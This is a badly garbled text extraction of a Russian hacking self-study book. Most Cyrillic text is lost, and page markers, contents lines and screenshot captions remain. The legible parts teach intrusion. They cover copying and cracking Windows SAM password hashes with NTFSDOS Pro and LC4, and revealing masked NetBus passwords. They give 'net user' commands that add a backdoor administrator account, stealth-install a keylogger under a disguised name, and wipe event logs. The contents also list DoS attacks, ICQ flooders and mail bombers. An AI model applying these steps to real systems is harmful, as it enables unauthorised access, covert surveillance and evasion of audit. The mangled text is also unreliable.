Самоучитель хакера подробное иилюстрированное...
TRANSCRIPT
-
5/28/2018
1/189
-
5/28/2018
2/189
-
5/28/2018
3/189
Alex Atsctoy
-
5/28/2018
4/189
004.056.53(075.8) 32.973.20208781+32.973.2018.2781
Alex Atsctoy.
: . . .: [,] /Alex Atsctoy. .: , 2005. 192 .:. ISBN 5936730360.
CIP
? ,
, .
:www.3st.ruEmail:[email protected]
ISBN 5936730360 , 2005 , 2005 , 2005
-
5/28/2018
5/189
1. 8
2. W in d o w sZ O O O / X f. 25 . 374. 5 75. f y ay ^ epof c W e b 7 3 6. 8 3 7. X a K U H f l C Q 99 8.W e b ~ c au m o & 1159.AmaKU'PoS 143 .
W i n d o w s 2000/Xf 1601 1 . 176 191
-
5/28/2018
6/189
1............................................................................................... 8 ............................................... . .................................................. 9
?...................................................................................................10 ...............................................................................................13
................................................................................................ 16 .......................................................................................................16 .................................................................................17 .............................................................................75
Web ........................................................................................................... 19
Web ............................................................................................................20
................................................................................................................21 .............................................................................................21 ................................................................ 22....................................................................................................... 22 .................................................................................................................23
................................................................................................................. 23
2.231 W m d O M S2O O O / X P ............................................... 25 ........................................................................ ................................ 25
...... ...... ...... ...... ..... ...... ...... ...... ...... ...... ...... ...... ...... ...... ..... ...... ...... ...... ..... 26
........................................................................................................................... 27
Windows2000/XP................................................................... 28 SAM .............................................................................................................................. 29 ...............................................................................................30
..............................................................................................................31
Windows 2000 ................................................................................33 ................................................................................................................. 35
................................................................................................................. 36
. & .................................................? ................................................................................. 38
NTFSDOS Pro ......................................................................................................39 SAM .................................................................................................................. 44 ....................................................................................47 ********............................................................................................. 50
......................................................................................... 51 ............................................................................................. 52 .........................................................................................................53
.......................................................................................................53 ................................................................................................ .. 56
-
5/28/2018
7/189
4. 5 7 58
59
63
66
68 69 70
72
5. & W e b 73 HTML 74
Web 78
81
82
6. 83 83
85 88
89 90 91
96
97
7.ICQ 99 100 ICQ 101
102 IP ICQ 103IC Q 104 ICQ 106I CQ 111
112 113
-
5/28/2018
8/189
8. We|?~C3UmO& 115 Web 115 Web 116
Web 118 1 19 120
IIS 5 122 123 125
Web Teleport Pro 131
132
136
HTML 138
Web 139
142
9.Ahl3KU" 143 DoS 144
145
145 8 147 Smur f . 14 8
149
151
Nuke 752 Teardrop 154 Ping of Death 154
Land 755
155 DoS 756
159
10. W i n d o w s2 /. TCP/IP 160
162 . 762
165 765
6
-
5/28/2018
9/189
168
NetBus 169 173
175
. 176 177
PhoneSweep 4.4 178
PhoneSweep 4.4 179
180
782 185
PhoneSweep 186
186 190
-
5/28/2018
10/189
1 . , , , , ,
. , , . , ( ).
, , .. , , 2 () . .
, :
log:
:
1: 2:
em: email
. , ! . 13.06.1999, .. .
!!!
, http://www.superinternetprovider.ru
, .
, , , , , , , , . , , ,
Web .
-
5/28/2018
11/189
, . , . ,
, , ,
,
.
,
, .
, , ,
. ,
,
!
, , ,
.
, ,
. ,
80 ,
, ,
, ,
.
.
, ,
, , .
,
, , .
( ), .
(, !)
,
, .
, ,
9
-
5/28/2018
12/189
, . , , , , , , . , ,
, , , , .
, . ,
. , ,
, , , , , .
, , , .
, , , , , .
20
. ? , , , , , , , , , (, )
, 10
-
5/28/2018
13/189
. , , .
, ,
. ( ).
, :
(, . ).
, , , .
Hard DISK [ Fdisk.exe] n ( , ) .
! , , !
[ 24% ] , POWER !
IDE .
, . , ,
, , , , , HARD DISK , , , . , Must die, . Windows,
, .
, , . , Windows ? , , ? , , , , .
11
-
5/28/2018
14/189
, ?
21 ().:
:
, , , , , . , .:
, . . , , , .
: . . , . . , , . .
: , .
, ?
, , ?
, ?
, .
, , ,
, , . . . . , , , (, ,
) . , :
12
-
5/28/2018
15/189
, 16 19 .
( 80%)
, nerd.
: 1) , ; 2)
. (, ?
).
Windows Unix,
TCP/IP
, ,C++,Perl, Basic. ,
.
,
19 . ,
,
, , .
,
, , . , , , , .
, ,
, .
, , , . ,
. ,
,
, .
.
, ,
,
. ,
.
, , .
, ,
.. , .
,
,
. , 13
-
5/28/2018
16/189
, ,
, .
, ,
,
,
.
, ,
:
.
,
. ,
, ,
, ,
,
[3]. , ,
, .
,
.
" ,
, ,
,
.
, .
,
, ,
. , , ,
.
14
-
5/28/2018
17/189
, ,, ,
.
, . ,
, .
, , ,
.
,
,
(.. ,
). ,
, ,
, , ,
. , ,
, , ( rootkit ). U N I X , Windows 2000 , 4,
, , ,
, Windows, , . .
IP,
.
. , ,
, , ,
.
, 4
, ,
.
15
-
5/28/2018
18/189
,
.
, , . ,
DoS ,
IDS.
.
,
.
, ,
, .
,
,
.
,
. ;
, .
,
, ,
, , .
, ,
,
. , [3]
,
. ,
, [3]
[1].
, (
). ,
16
-
5/28/2018
19/189
, , . , , , , , . , . , , ,
. , . , ,
, . .
.
Web (, RIPE NCC http://www.ripe.net). Web, Whols, , , .
, , , Web. Yahoo(http://www.yahoo.com), Rambler(http://www.ram bler.ru) . . , , , ,
. , , , [3]. Google(http://www.google.com), . , , C:\WINNT, Wi n dows NT/2000. , .
17
-
5/28/2018
20/189
, , Teleport Pro. , Web
, ., , HTML Web
, , HTTP . , , , , , ,
, , ( 11 ). , Web , , . , .
, , , . .
, , , , .. , , . SAM(Security Account Manager ), . SAM , 3 , , LOphtCrack LC4 (http://www.atstake.com)., , , , Windows , MS Office . , .
, 3 . Office Password 3.5(http://lastbit.com/download.asp) Windows , , .
Revelation SnadBoy(http://www.snadboy.com). , 18
-
5/28/2018
21/189
***** ,
, Revelation .
, , , , , , . .
?, , , .
W e l o
. , Web, , .
, Web, Web,
Web , . Web 5 .
,
. , Web, .
. , , 6 Death & Destruction E mail Bomber . , . , , , 6 Brutus.
19
-
5/28/2018
22/189
, , ICQ.
IP ICQ ( flood )ICQ , ! , 7 ICQ Flooder, I CQMu lt iV ar,
.
,
IP ICQ ICQ,
,
.
,
.
W e bWeb , , ,
DoS, .
, IIS 5 (Internet Information Server ) Microsoft
.
Web
, Web,
HTML
. 8
, , CGIScan
Brutus, IIS
. 9 , DoS.
Web ,
,
Web. , DoS
, , .
Web
, , CGI.,
, .
20
-
5/28/2018
23/189
TCP/IP , , , , IP,
, . , .
10 SuperScan, foundstone_tools(http://www.foundstone.com).
W2R K (Windows 2000 Resource Kit Windo ws 2000), , W 2 H K (Windows2000HackerTools Windows 2000).
,
, , .
f le pe x& a m , , . , , , .
,
. , , .
. , , , , . SpyNet, .
21
-
5/28/2018
24/189
, , VPN (Virtual PrivateNetwork ) , , . , , , ,
, .
, W2RK ( Windows 2000) W2HK Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP.
, , . , NTFS Windows 2000/XP, , ,
PGP Desktop Security.
11~ , , .. . Web ,
(., , http://www.securitylab.ru). 8 IIS. CGIScan
, . ,
22
-
5/28/2018
25/189
,
, II S4. Web , .
,
, . .
,
; , , ( ). ,
, ,
, .
,
.
,
. 10 NetBUS,
. , .
,
, , .
.
, ,
. , ,
, , ... , , .
, , , ,
. ,
,
( ), ,
? , ,
23
-
5/28/2018
26/189
,
, ?
, ?
, ,
( ),
, , ,
.
, .
. ,
, ,
,
. , , .
,
,
,
, .... , ,
Windows 2000/XP.
24
-
5/28/2018
27/189
2 . W i n d o w s/Xf Windows 2000
TCSEC (Trusted Computer System Evaluation
Criteria ) . ,
Windows 2000, ,
.
.
.
.
.
.
, ,
, ,
, , .. ,
.
, ( log in ),
,
. , , ,
, .
Windows NT/2000/XP SAM (SecurityAccount Manager ). SAM
, ,
. SAM
, 3 . ,
.
,
, , .
,
-
5/28/2018
28/189
, ,
. , , ,
.., , , ,
. , , , (, , ) ,, , .
,
, , , .
Windows NT 4 NTLM(NT LAN Manager NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager ),
, Windows
NTLM. Windows 2000/XP Kerberos, , ,
.
Windows 2000/XP,
Windows 2000 Kerberos.
,
Windows 2000/XP . , ,
, ,
.
,
, ,
.
.
Windows
, , ,
. ,
, .
, , ,
, ,
.
2 6
-
5/28/2018
29/189
Windows 2000/XP , Windows NT/2000/XP .
, . ,
,
.
, , . ,
(Guest), , (User), .
, , ,
.
, (Administrators), ,
, ,
...
u r n,
, .
,
,
, ..
,
. , , . ,
, ,
, ,
.
Windows NT/2000/XP, , ,
.
, 4, ,
, .
,
, , , ,
2 7
-
5/28/2018
30/189
, ,
.
,
11, , .
, , [2], [6],
,
Windows 2000/XP, , .
W in d o w s 2OOO/XP Windows 2000/XP SRM
(Security Reference Monitor ). SRM
Windows 2000/XP, .. .
Windows2000/XP , ,
SRM. .
LSA (Local Security Authority ),
,
, LSA.
, LSA
. , LSA
, .
SAM (Security Account Manager
),
.
, LSA.
AD (Active Directory ),
AD . ,
LSA. ,
, :
, ,
Kerberos;
, .
, , , :
, ,
28
-
5/28/2018
31/189
Windows 2000/XP , /, .
SAM AD ,
LSA . ,
, , ..
, SRM., ,
Windows 2000/XP. , . ,
(SAM AD); ,
. ,
.
SAM, , , ,
. , ,
, SAM AD,
. SAM %%\5132\\5, AD %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , . ,
, , ,
, Windows2000/XP. SAM Windows NT 4 ,
NTLM , ,
,
LM,
Windows. LM , SAM
, , LOphtCrack
(http://www.atstacke.com) , .
LOphtCrack
SAM,
, , pwdump
(http://www.atstacke.com). Windows pwdump SAM
, LOphtCrack,
,
LM .
29
-
5/28/2018
32/189
Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , , 34, . , 1 Microsoft,
Microsoft!
Windows. , , .
Windows 2000/XP , , , , , ? .
, , Windows, SID (SecurityIDentifier), 48 , . Win
dows2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List
), (Access Control Entries
). SID . ACL
30
-
5/28/2018
33/189
Windows 2000/XP, , (Explorer) Windows,
Windows2000/XP. ACL.
Windows2000/XP (, ) LSA , SID
8 , ., , SRM 8 ACL , , . , , . ,
, ,
. ,
.
ACL
, Windows 2000/XP . , (
, http://www.rootkit.com). ,
ACL ,
,
?
, . ,
, Windows 2000/XP.
Windows NT 4 , .. , Windows 2000/XP ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server.
, ,
.
, , ,
, ADS ,
, ..
. , , IP .
31
-
5/28/2018
34/189
ADS ,
, ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU
, .. OU
, OU .
Windows 2000/XP , .
,
.
Windows 2000 , ,
Windows 2000 Windows NT. ,
,
.
Windows 2000/XP , . ,
,
.
, ..
.
,
. , domen. : com* .domen, comp2.domen...
, ,
, ,domenl, domen2,... , ,
.
, domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ...compN.domen2.domen1. domenl domen2, forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .
32
-
5/28/2018
35/189
Windows 2000/XP
, , :
.
(Universal group), , ,
.
(Global Group), , , .
(Local group domain), , .
ACL . . , , AD,
, , .
AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . ,, , Window 2000, . , , LC4
LOpghtCrack .
, , .
W i n d o w s2000 Windows 2000
, . ,
332 5830
-
5/28/2018
36/189
, , , . , , , [7], , . , ,
, . .
,
,
AD. ,
.
,
.
. ,
. ,
,
,
, ,
, .
, , ,. . , , ,
LM,
LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2( Service Pack 4 Windows NT 4)., , Windows 2000 Kerberos, ,
.
.
, Windows 2000/XP Windows
, LM. Windows 2000/XP Kerberos,
NTLM LM.34
-
5/28/2018
37/189
Windows 2000/XP
TCP 88 ,
Kerberos, .
LM NTLM, LOphtCrack
.
, ,
. , ?
, , ,
.
, ,
. ,
. , , , .
,
.
,
, Windows 2000.
,
Microsoft ,
, . W i n d o w sXP
Windows.
Windows 2000/XP [7], . , ,
,
.
, , Retina,
[7].
35
-
5/28/2018
38/189
,
. ,
, , VPN (Virtual Private
Network ). VPN ,
. VPN ,
.
, , , ,
(Bruce Schneier),
(Applied Cryptography), .
,
,
, .
, ..
.
Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, / ADS , Microsoft Press Windows 2000.
36
-
5/28/2018
39/189
3 & Window 2000/XP, ,
, ,
, ? , 2,
,
,
,
. . ( ,
. .)
,
. ,
,
, ( ...).
, , . ,
, , ,
,
,
( ).
? ,
, .
.
, . ,
, .
, .
, ,
,
Windows. , ,
,
,
.
, , ,
-
5/28/2018
40/189
(. 1), , . , , , .
, , , Windows BIOS . , Windows2000/XP .
,
(, ). , , MSDOS ! ,
. , BIOS , BIOS . .
, BIOS , NTFS, Windows2000/XP. , MSDOS , .
, , , ( , ! , . , , ),
Windows 2000/XP. NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MSDOS. , , Windows2000/XP
. , . NTFSDOSProfessional .
38
-
5/28/2018
41/189
1515fro NTFSDOS Pro .
Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. . , FORMAT/SSYSMSDOS. Windows XP Create anMSDOS startup disk ( MSDOS).
> * NTFSDOS Professional(StartProgramsNTFSDOS Professional). (. 3.1).
wizardwillhelpyouinstallV/indowsNT/200DvXPsystem files neededNTFSDOSProfessionalto run from a MSDOS diskette or hard disk
PMC. 3.1. NTFSDOS Pro> Next ().
(. 3.2),
, .
> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 3.3) .
39
-
5/28/2018
42/189
NTFSDOS ProfessionalBootDiskWizard copies drivers and system files from an existing WindowsNT/20QP/xPinstallationorCDROMto your hard disk or a pair of floppy diskettes.If you wish to create bootable diskettes you must addMSDOSto the diskettesyourself,either before orafterusing thisprogram. Use theFORMAT/Sor SYS commands from a MSDOS shell to makebootable diskettes.
You can also make a bootable diskette on Windows XP by opening MyComputer,selecting the"Format"option fromthe context menuof your diskette drive, and formatting a diskette with the"Createan MSDOS startup disk" option checked.
< Back Next > Cancel J. .2.
NTFSDOSProusesthecharacterset torHieUnited States vers ion of MSDOS(aidepage437) bydefaultSelect any additional character setsyouuse with DOS.Japan,code page 932Korean(Johab).code page 1361Korean,code page 949MSDOS CanadianFrench,code page 863MSDOSIcelandic,codepage 661MSDOS Multilingual (Latin1).code page 650MSDOS Nordic,code page 865MSDOS Portuguese,codepage86MSDOSSlavic (Latin II). code page 852
< Back Next > Cancel
. ..
> Next(). NTFSDOS Pro(.3.4).
WindowsNT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 WindowsN T/2000/XP, Service Pack. Next ().
NTFSDOS Pro (. 3.5).
40
-
5/28/2018
43/189
Pro uses copies of several fileslocatedin your WindowsNT/200Q/XPm directory.Specifythenameofyour Windows NT/2Q.OOVXPinstallationdirectory,oradirectorycontainingtherequired
WindowsNT/2000system files.|c\ASFRool
-
5/28/2018
44/189
floppy labelledNTFSDOSProfessional0
PressNextto copy filesID A:V
Next (), (. 3.7).
Copyingfilesto diskette...
Cancel
Puc. 3.7.
(. 3.7) Next
() . Windows XP
NTFSPRO.EXE
, NTFS .
Windows NT/2000 .
NTFSCHK.EXE,
NTFS.
42
-
5/28/2018
45/189
(. 3.8)
NTFSDOS Professional.
necessaryfiles hovebeencopied.Youmay nowreboottoMSDOSbegin using NTFSDOSP rofessional Edition.
. .8. NTFSDOS Pro
> Finish (), .
NTFSDOS Pro,
. NTFSDOS
Pro . ,
, NTFSPRO.EXE,
NTFS . ,
, MSDOS ,
FAT FAT32,
NTFSDOS Pro .
MSDOS NTFS, Windows 2000/XP . ,
( ), , ,
. ,
, , ,
. ,
, , .
SAM,
, , _/132/1'|.
43
-
5/28/2018
46/189
5 SAM, SAM.
NTFSDOS Pro, MSDOS SAM
/ K O p e H b _ C M C T e M b i / s y s t e m 3 2 / c o n f i g . , , LC4 LOphtCrack(http://www.atstake.com).
. 3.9 LC4 Import().
Import| Senion HelpIB? Import FromLocal MachineImport From Remote Regist iy..Import From SAM File...
Import From Sniffer...
Import From .LC File...Import From.LCS(LC3)FileImport Frum P W D U M P File...
I File* New Session ( * ). , . 3.9.
> Import I m p o r tFrom SAM File(* SAM). SAM.
> SAM, 13.
> (.3.10) SessionBegin Audit( ) .
44
-
5/28/2018
47/189
?l@stakeLC4 (UnlilbdllFile View Import S e s t i o n Help .iu \ f t \ _u
lALEX3IALEX(ALEXlALEX3lALEX3lALEX3[ALEX3
AdministratorASPNETGuettH e l p A s s i t t a ntIUSH_ALEX3IWAM_ALEX3NewUzer
emptyempty empty emptyamply" empty
empty
e. ;Od Oh Qm usi a s
CS
mporled 7accounts
Puc. 3.10. SAM , , SAM,
. , .3.11, SAM.
A d n un i i t i a lo iASPNET
GuelHelpAti.tlonlIUSH.ALEX3IWAM.ALEX3NenUter
. 3.11. SAM ! , 007 , , ., , 5 Pentium 2 400 .
45
-
5/28/2018
48/189
, LC4
.
LC4 AuditingOptions For This Session( ), .3.12.
Dictionary CrackD Enabled Dctionary List [TheDictionaryDeck t e s t s Fo r passwords that are thesameas the words listed in the
word file. This testisveryfastandfindsthe weakest passwords.Dictionary/Brute Hybrid CrackEl Enabled | Characterstoprepend
3 ICharactersto appendCommonletter substitutions (much slower)The Dictionary/Brute Hybrid Crack testsfor passwordsthatare variations of the words inthewordfile. It findspasswordssuch as"Dana99"or"monkeys ".This testisfast andfinds weakpasswords.Brute ForceCrackEl Enabled
D Distributed
Character Set
|AZandO9Custom ClaraclwSetchch*:ttrt
Ptrtli. IOil JThe Brute Force Cracktestsfapasswords thatare made up of thecharactersspecifiedin theCharacterSet. It findspasswordssuch as"WeR3pll6s"a"vC569t12b".Thislestis slow and finds mediumtostrongpasswords.Specify acharacterset with morecharacters to crack strongerpasswords.
OK Cancel
Puc. 3.12. , LC4 :
Dictionary Crack ( ), DictionaryList ( ),
. LC4 , ,
. ,
, , , ,
.., .
Dictionary/Brute Hybrid Crack(/ ), , / , , .
Password???, .
46
-
5/28/2018
49/189
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) . Distributed () . File SaveDistributed ( ) .
LC4
Windows NT/2000/XP. Windows,
Windows 95/98, Pwltool.
'
Windows ,
, .
MS Office
(http://www.elcomsoft.com), OfficePassword 3.5. ,
, *******
Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows ,/,, , Window OfficePassword .
47
-
5/28/2018
50/189
OfficePassword3.5 OfficePassword3.5 Lotus Organizer,MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicke n, MS O ffice Excel, Word, Access, Outlook, ZIP VB A, MS Office.
OfficePassword3.5 . Word password.doc, ?
Password Enter password to openfile\test\password.docII [OK 1CancelPuc . 3.13.
Word
, Windows, password.doc, (. 3.13).
, OfficePassword 3.5 :
OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).
> Select document MS O ffice.
I OfficePassword" D E M O "File Took Option* Help
1]Selecl document
You can also diaganddropfiles from nternetExplorer onto thiswindow.
>(c)19982001VitasRamanchauskas.LastBitSoftware
-
5/28/2018
51/189
, .
> , Select recoverymode ( ), . 3.15.
Select l e c o v e rv m o d eJocumentpath:C:\test\passwotddoc (Word)Version :Wotd8.0+ntemal version: 133
Word language : Russian(0419)incryption type: StrongT e x t size : 537
Preview AutomaticOflicePassword automatically selects mostsuitable recovery options. Recoverymay take a
lot of time (up to several months in caseola long password]. About 80%of all passwordscould be recovered within48hours.U seguaranteed recoveryotherwise.
UserdefinedAdjustsettings tooptimize searchfor specificcase.(This option is for advanceduseisonly.)
G uaranteed recovery
Success isg uaranteed Important: please read the documentation. Additional fee mayapply.I Click here to learn
Cancel |Display helpnfo NextPuc. 3.15,
> Select recovery mode ( ) :
Automatic ( ), , Next (), , .
Userdefined ( ), . .
Guaranteed recovery ( ), , , , .
>
Next
l Ol f i c e Passwo i d 'DEM O*P assword found:'007' (without quotes)The passwordh asbeencopied onto the clipboard
Would you like to open the documen t n ow?
L Yes NoPuc. 3.16. !
49
-
5/28/2018
52/189
(). , ,
(.3.16). OfficePassword 3.5 , ,
. , .
,
,
.
, , 24 28
, . , , .
, ,
,
.
******, ,
, (,
), ,
******. , ,
, .
, , ,
. ,
.
,
,
. ,
, N e t B u s . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus
NetBus.
50
-
5/28/2018
53/189
* SnadBoy'sRevelation
007
'CrcledV CursorDragto revealpassword | Check For Up dat e )| About Exit
Textol Window Under'Crcled V Cursor(l available) I Copy toclipboard
Status
Revelationactive.Length of available text: 3
iSWORD2000iMycq ^
Change Hoct"Hostinformation
Destination:|SWORD200Hostname/IP: 1.001
TCPport:Username:|AdmnstratorPassword:
RepositionRevelation out of the way when dragging'circledV Always on topWhen minimized, put in System Tray Hide 'How to'instructions
Howto1)Left click and drag (while holding downthe left mouse button) the'circledV2) As you dragthe'circled +' cursoroverdifferent fieldson various windows, the text in the fieldunderthecursor will be displayed in the Text of Window...'box.3) Release the left mouse button when you have revealed the text you desire.
NOTE II the field contains text hidden byasterisks(or some othercharacter),theactualtext will beshown. In some cases the text may actually be asterisks.NOTE Not an of the fields that the cursor passes over will have textthat can berevealed. Checkthe status lightfoi availability of text.
Bright green textavailable (Seelengthof text:' inStatus area)Blight red no text available
Cancel
Puc. 3.17. NetBus Sword2000 !
Revelation . 'Circled+'Cursor ('+') SnadBoy'sRevelation ( . 3.17
Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( ) ) ( ). .3.17, 007 NetB us Sword2000, ( ). ( NetBus) [11]. , , , , . : .
51
-
5/28/2018
54/189
, 4. , ,
, . , , ,
. , backdoor , , .
&* , , , , .
MSDOS: NET USER < > /ADD, , NETLOCALGROUP < > < > /ADD,
. . 3.18 .
r^JCommand Prompt
NewUser 00 /add| T h e c o m m a n d c o m p l e t e d succe s s fully.
C:\>net localgroupfldministrators N e w U s p r /addI T h e c o m m a n d c o m p l e t e d s u c c e s s f u l l y
Puc.3.18. NewUser
NewUser , , .
, , .
52
-
5/28/2018
55/189
, .
Windows Startup Document and Settings ( ) , . Startup, All users, .
, , . , ( ) , . IKS (Invisible KeyLoggerStealth ), http://www.amecisco.com.
, . , , .
IKS http://www.amecisco.com, I n v i s i b l eKeyLogger 97 8 10 , .
Win do ws NT/2000/XP, , , 1 'l+ir^n+l0"8"]. IKS
W indows NT/200 0/ XP . , IK S , .
IKS . Webiks2k20d.exe , .3.19.
53
-
5/28/2018
56/189
DStandard Instal|pStealth Install |DUninslal|
It'srecommendedthatyou use Standard Install if this is your first timein using IKS. Justacceptthedefaultsanddickon"InstalNow"button.OryoucandickonReadreadme M"to get familiarwith the concept of IKSfirst.During a standardinstallationa program directory will becreated; program files will beplaced in the directory. An icon to the log file viewerwillbe placed onthedesktop. NoTilerenaming (stealth features) will take place.
InstallDirectory
|C\ProgremFiles\iksYou need tohevaad ministratorrights on this system foritto installsuccess fully.
rf youwanttouninstalin the future, just run thisprogram(ksinstall.exe)again,dick on the"Unmstall"tab, then "UninstallNow"to automatically uninstall the standard installation.
Readreadme.M
. 3.19. IKS Install Now ( ) . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.
S et t in g s Help
0FlterOut Arrow KeysDFlterOut Ctrl and Alt KeysRtterOut F1 toF T 2KeysFilter Out All Other Function Keys
U seNotepad Translatet o Text Only
GearLa aClear Binary Log Upon Exit0dearText Log Upon Exit
Import Binary Log From:
SaveTextLogTo:C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,
Puc. 3.20.
54
-
5/28/2018
57/189
Go! () , . . 3.20 , , .
, IKS
, . iks.sys K O p e H b _ C H C T e M b i / s y s t e m 3 2 / d r i v e r s , (
Regedt32 .3.21).R e g i s t r y E d i t o r [HKEY LOCAL MACHINE on Lo c nl M nchi
Registry Edit Tree View Security Opt i o ns Window HelpSGemuwaSGpc&I37DRIVERCEJIASICQ GroupwareCOIISADMINIPMkslCDILDAPQIMAP4D32GDIMonitor inetaccsCllnetln(o
Inport
Start:REG_DWORD:0x3Type: REG_DWORD:0 x1
Puc.3.21. Windows (,
The Clean er, ). IKS, Stealth Install( ) (.3.19)
, calc.sys, (, ).
IKS
. 007 StealthMonitor, Web,
, , . Win dows , , , notepad.exe.
55
-
5/28/2018
58/189
, BIOS, .
, . , , . ,
, , , , ( ), , , .
, , .
Windows 2000/XP . Win do ws 9 x / M e , , PGPDesktop Security, . Windows 9x/Me ,
.
, , , , ? . .
56
-
5/28/2018
59/189
4.
, ,
,
. , , , ,
, , , ,
. , , , , ,
.
,
. 1 ,
50%
,
, , .
, , ,
. ,
,
, ,
.
,
( ).
,
( ).
, . , , , , . .
-
5/28/2018
60/189
, , ,
. , ,
,
. ,
privacy .
,
, , , ,
, ,
.
, [10],
(, )
, ,
privacy. ,
, , ,
, , , . .
, , ,
,
,
. ,
.
.
, . ,
, .
, , , ,
.
, .
. ,
Web
, Web
,
.
,
, ,
58
-
5/28/2018
61/189
(,
).
,, , ,
. ,
? , ,
. :
, . , Web.
, .
,
.
Windows,
(Explorer) , .
,
Win do ws .
,
MS Office.
, , ,
.
?
, .
. ,
,
(Explorer) ,
. , (Delete) Windows , , .
W i n d o w s, , , , , MS Office.
, ,
(Show hidden files and folders)
59
-
5/28/2018
62/189
(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).
)0 j | |j I
( .| | |
: " " ;D 0 0 ()Q
Q ,/ "
< 1 |
OK I 1I. 4.1.
Word (Delete) Windows , . . 4.2, , Word, , , .
^3 IQPGP
g SecurityI ; DatabaseLSJ I
rf 3.5 (:)& (:)(D:)
: 10 (50 ||
3PGPI]Security5| 5 0 ~ $ . d o c
|~WRL0002.tmp_ ~ W R U > 0 0 4 . t m p|~WRL1120.tmp~WRL19B2.tmp|~WRL3531.tmp
Puc. 4.2. ,
, . , .WB K, 60
-
5/28/2018
63/189
, ~$. , , , Windows, , , Win do ws . , , , . ?
, MS Office, , , , Norton Utilities. Cleaner Disk Security( ht tp :/ / w w w . th e a b s o l u t e . n e t / s w a r e / i n d e x . h tm l tt C ln d i s k ) . , , , . , . ,
, . , , . ( 100%) .
. 4.3 Clean Disk Se curity 5.01( h t t p :/ / www. t h e a b s o l u t e . n e t / s wa r e /index.html#Clndisk),
,
( ).
Clean Disk Security 5.01
Erasefully ( ).
, , (
. 4.3. Clean Disk Security 5.01
61
-
5/28/2018
64/189
FAT NTFS). ,
, .
Windows, Windows,
Temp ( , ,
)
. ,
, , (cookie).
,
(. 4.3).
. 4.3, :
Simple () 6 ,
.
; 1 .
NIS 7
(.. ) .
Gutmann 35 (.. ).
(Peter Gutmann)
. .
,
( ).
Test mode ( ) #10
ASCII.
. , Clean Disk Security 5.01
, ,
.
, [10]. , :
(UPS);
. , , .
,
.
62
-
5/28/2018
65/189
, , .
, ,
. ,
,
, .
,
. ,
, , Norton Util ities,
, / , .
, ,
[10]. ( )
, ,
regedt32.
. ,
,
NTFS.
, ,
,
. ,
Web
.
, , . .
, ,
.
& , ,
.
. ,
.
63
-
5/28/2018
66/189
, . (). , ,
, .
( Web, , , ), , , , . , , .
(., [5],[10], , , ). , ,
. , , , . , .
, , . .
, . , , ,
. ,
, , , , . , , Web ,
64
-
5/28/2018
67/189
. HTML Web. Web , , Web, .
,
, Web http://www.privacy.net/analyze, , Web . . 4.4, , Web, .
3lAnalyze YourInternetPrivacy Microsoft Internet Explorer^^ ^ ~ BBSBBBgg ** ^
Your Browser Type and Operating System:
Mozilla/4.0(compatible;MSIE5.01;Windows NT 5.0;MSIECrawler)All Information sent by your web browser when requesting this web page:
Accept: */* AcceptLanguage: ru Connection; keepalive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:Date=1/30/2002;Privacy.net=Privacy+AnalysisVia: 1.1 cea15. 1.1proxy.iptelecom.net.ua:3128(Squid/2.4.STABLE3) XForwardedFor: 212.9.232.151,212.9.224.89 CacheControl: maxage=259200
a _ . 4.4. W eb
, ( )
Whols, 1, .
, , IP . Web Web , IP
...
65
3 5830
-
5/28/2018
68/189
, , Web, ( a n o n ym i z e r ). , Web, ,
. , , http://www.anonymizer.com.(. 4.5).
Anonymiz er.com Onlinu Privacy Sorvic4 1 | U [ ifer
hup.//ww wanonymteBf.coin.Anonymizer.com(|AboutPrivacy
FINDITSTO spyCap ' :. 4.5. Web
Go.
, FTP, , , . , , ,
Web, , . ( ), .
Web , (Proxy server)
(. 4.6).
66
-
5/28/2018
69/189
' " . ,
D
Q
0 : |www.anonymize| ; J8080 [...D
:::
111
|
. 4.6.
, , ,.. Web , .
.
HTTP, FTP, Web, FTP.
, .
.
. , , , Web, ,Yahoo. proxy+server+configuration+Explorer, Web, , . , , .
67
-
5/28/2018
70/189
, , , , , , , . , , ,
3 IKS. , , N e t B u s(http://www.netBus.org). , , , , , .
:
, ( ).
IP , , .
, , . , Back Orifice 2000 31337 , , 31336, , , .
,
Windows NT/2000/XP. , auditpol W2RK, , , e lsave.exe ( h tt p :/ / w w w . ib t . k u . d k / j e s p e r / E L S a v e / d e f a u l t . ht m ) . (Event Viewer) Window s2000/XP.
, , (Hidden). Win do ws , .
, .
, 68
-
5/28/2018
71/189
, , explorer.exe, Windows
Windows.
, EliteWrap,
[11].
( Rootkit ).
,
,
.
.
Tripwire (http://www.tripwiresecurity.com), , Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].
, ,
,
, .
,
/ . Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, .
:
